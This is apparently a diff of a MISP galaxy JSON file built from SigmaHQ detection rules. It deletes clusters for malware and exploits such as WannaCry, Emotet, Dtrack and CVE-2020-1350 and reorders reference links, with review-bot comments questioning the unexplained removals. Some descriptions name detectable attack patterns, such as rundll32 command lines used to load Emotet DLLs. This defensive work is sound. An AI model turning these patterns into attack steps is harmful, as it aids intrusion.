"https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml"
],
@@ -40988,43 +40838,6 @@
"uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b",
"value": "Renamed AdFind Execution"
},
- {
- "description": "Detects potential Dtrack RAT activity via specific process patterns",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/10/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_dtrack.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/my-name-is-dtrack/93338/",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
- "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/",
- "https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4",
- "value": "Potential Dtrack RAT Activity"
- },
{
"description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)",
"meta": {
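Review bot: Deleting the "Potential Dtrack RAT Activity" cluster (uuid f1531fa4-5b84-4342-8f68-9cf3fdbd83d4) outright leaves any MISP instance that already tagged events with that UUID holding a dangling reference, and the commit gives no reason for the removal. The ref still points at rules/windows/process_creation/proc_creation_win_malware_dtrack.yml; if the upstream Sigma rule was relocated rather than retired, the generator should follow it to its new path instead of dropping the cluster, and if it was retired, the removal deserves a line in the commit message.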
@@ -41059,40 +40872,6 @@
"uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89",
"value": "WhoAmI as Parameter"
},
- {
- "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/14",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_35211_servu.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.001",
- "cve.2021.35211"
- ]
- },
- "related": [
- {
- "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "75578840-9526-4b2a-9462-af469a45e767",
- "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322"
- },
{
"description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.",
"meta": {
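Review bot: This cluster is the one carrying the "cve.2021.35211" tag, so removing it loses the CVE-to-detection mapping for Serv-U CVE-2021-35211 and the related link to dest-uuid 635cbe30-392d-4e27-978e-66774357c762 (attack.t1136.001) with it. Please confirm whether proc_creation_win_exploit_cve_2021_35211_servu.yml was deleted upstream or merely moved out of the rules/ tree the generator scans before accepting the deletion.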
@@ -41242,49 +41021,6 @@
"uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b",
"value": "Unusual Parent Process For Cmd.EXE"
},
- {
- "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/15",
- "falsepositive": [
- "Unknown but benign sub processes of the Windows DNS service dns.exe"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_1350.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/",
- "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487",
- "value": "DNS RCE CVE-2020-1350"
- },
{
"description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting",
"meta": {
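Review bot: This deletion drops two "related" links (dest-uuid 3f886f2a-874f-4333-b794-aa6075009b1c and f1951e8a-500e-4a26-8803-76d95c4554b4) along with the rule, so the ATT&CK cross-references for T1190 and T1569.002 reachable from uuid b5281f31-f9cc-4d0d-95d0-45b91c45b487 disappear too. The falsepositive text ("Unknown but benign sub processes of the Windows DNS service dns.exe") is an FP caveat, not a retirement reason; if the intent is to retire the CVE-2020-1350 rule, say so in the commit message rather than leaving it implicit.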
@@ -41328,48 +41064,6 @@
"uuid": "15619216-e993-4721-b590-4c520615a67d",
"value": "Potential Meterpreter/CobaltStrike Activity"
},
- {
- "description": "Detects Rorschach ransomware execution activity",
- "meta": {
- "author": "X__Junior (Nextron Systems)",
- "creation_date": "2023/04/04",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_rorschach_ransomware_activity.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.defense_evasion"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68",
- "value": "Rorschach Ransomware Execution Activity"
- },
{
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
"meta": {
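Review bot: The Rorschach cluster (uuid 0e9e6c63-1350-48c4-9fa1-7ccb235edc68) has creation_date 2023/04/04 and is removed here with no explanation; a rule that young being dropped more often indicates an upstream path change than a retirement. Check that rules/windows/process_creation/proc_creation_win_malware_rorschach_ransomware_activity.yml really no longer exists upstream, and if it was moved, add the new location to the generator's scan list instead of deleting the cluster.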
@@ -41483,8 +41177,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/countuponsec/status/910977826853068800",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://twitter.com/countuponsec/status/910969424215232518",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"
],
"tags": [
@@ -41550,8 +41244,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://h.43z.one/ipconverter/",
+ "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml"
],
"tags": [
@@ -41654,8 +41348,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"
],
"tags": [
@@ -41777,9 +41471,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml"
],
"tags": [
@@ -41848,8 +41542,8 @@
"logsource.product": "windows",
"refs": [
"https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
- "https://twitter.com/Hexacorn/status/1420053502554951689",
"https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
+ "https://twitter.com/Hexacorn/status/1420053502554951689",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml"
],
"tags": [
@@ -41890,9 +41584,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_susp_flags.yml"
],
"tags": [
@@ -41960,13 +41654,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ngrok.com/docs",
"https://twitter.com/xorJosh/status/1598646907802451969",
- "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
- "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
- "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
"https://www.softwaretestinghelp.com/how-to-use-ngrok/",
+ "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
+ "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
+ "https://ngrok.com/docs",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml"
],
"tags": [
@@ -41999,8 +41693,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/",
"https://lolbas-project.github.io/lolbas/Binaries/Gpscript/",
+ "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"
],
"tags": [
@@ -42033,8 +41727,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/1ZRR4H/status/1534259727059787783",
"https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/",
+ "https://twitter.com/1ZRR4H/status/1534259727059787783",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml"
],
"tags": [
@@ -42067,13 +41761,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
"https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
- "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
+ "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
"https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml"
],
"tags": [
@@ -42114,9 +41808,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/hFireF0X/status/897640081053364225",
"https://github.com/hfiref0x/UACME",
"https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
- "https://twitter.com/hFireF0X/status/897640081053364225",
"https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml"
],
@@ -42229,108 +41923,6 @@
"uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b",
"value": "Arbitrary Command Execution Using WSL"
},
- {
- "description": "Detects WannaCry ransomware activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_wannacry.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1210",
- "attack.discovery",
- "attack.t1083",
- "attack.defense_evasion",
- "attack.t1222.001",
- "attack.impact",
- "attack.t1486",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079",
- "value": "WannaCry Ransomware Activity"
- },
- {
- "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par",
- "meta": {
- "author": "Olaf Hartong",
- "creation_date": "2019/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_bearlpe.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_bearlpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1053.005",
- "car.2013-08-001"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf",
- "value": "Potential BearLPE Exploitation"
- },
{
"description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products",
"meta": {
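Review bot: Two unrelated clusters ("WannaCry Ransomware Activity", uuid 41d40bff-377a-43e2-8e1b-2e543069e079, with five related links, and "Potential BearLPE Exploitation", uuid 931b6802-d6a6-4267-9ffa-526f57f22aaf) are deleted in one hunk; the commit message should enumerate the UUIDs being retired so downstream taggers can migrate. Separately, the BearLPE description string ends with a stray RTF `\\par`; if that rule is ever reinstated, the fix belongs at the source so it is not re-imported verbatim.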
@@ -42344,9 +41936,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2023/03/06/2022-year-in-review/",
"https://www.yeahhub.com/list-installed-programs-version-path-windows/",
"https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product",
- "https://thedfirreport.com/2023/03/06/2022-year-in-review/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml"
],
"tags": [
@@ -42380,8 +41972,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65",
- "https://redcanary.com/blog/yellow-cockatoo/",
"https://zero2auto.com/2020/05/19/netwalker-re/",
+ "https://redcanary.com/blog/yellow-cockatoo/",
"https://mez0.cc/posts/cobaltstrike-powershell-exec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml"
],
@@ -42540,8 +42132,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://www.joeware.net/freetools/tools/adfind/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml"
],
@@ -42688,8 +42280,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/hexacorn/status/1448037865435320323",
"https://twitter.com/Gal_B1t/status/1062971006078345217",
+ "https://twitter.com/hexacorn/status/1448037865435320323",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml"
],
"tags": [
@@ -42709,40 +42301,6 @@
"uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b",
"value": "Potential Command Line Path Traversal Evasion Attempt"
},
- {
- "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL",
- "meta": {
- "author": "FPT.EagleEye",
- "creation_date": "2020/12/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://cyber.wtf/2021/11/15/guess-whos-back/",
- "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet_rundll32_execution.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9",
- "value": "Potential Emotet Rundll32 Execution"
- },
{
"description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM",
"meta": {
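Review bot: Removing the Emotet rundll32 cluster (uuid 54e57ce3-0672-46eb-a402-2c0948d5e3e9) drops a detection keyed on a pattern (rundll32.exe command lines ending in ,RunDLL or ,Control_RunDLL) that is useful well beyond Emotet. If the upstream rule was renamed or generalized rather than retired, a replacement cluster should show up in this diff, and none does in the visible hunks; please confirm which case applies.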
@@ -42811,16 +42369,16 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml"
],
"tags": [
@@ -42923,9 +42481,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml"
],
"tags": [
@@ -43023,39 +42581,6 @@
"uuid": "48bbc537-b652-4b4e-bd1d-281172df448f",
"value": "Sysinternals PsSuspend Execution"
},
- {
- "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location",
- "meta": {
- "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2020/06/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_binary_masquerading.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b",
- "value": "Lazarus System Binary Masquerading"
- },
{
"description": "Download and compress a remote file and store it in a cab file on local machine.",
"meta": {
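Review bot: The Lazarus masquerading cluster (uuid 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b) is an attribution-level detection mapped to attack.t1036.005, and its removal has no replacement in the visible hunks. Verify whether proc_creation_win_apt_lazarus_binary_masquerading.yml was moved upstream and, if so, point the generator at the new path rather than silently dropping the UUID.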
@@ -43103,8 +42628,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml"
],
"tags": [
@@ -43137,9 +42662,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://twitter.com/nas_bench/status/1534915321856917506",
"https://twitter.com/nas_bench/status/1534916659676422152",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"
],
"tags": [
@@ -43391,8 +42916,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://twitter.com/0gtweet/status/1628720819537936386",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml"
],
"tags": [
@@ -43583,8 +43108,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/bryon_/status/975835709587075072",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"
],
"tags": [
@@ -43757,10 +43282,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://twitter.com/splinter_code/status/1483815103279603714",
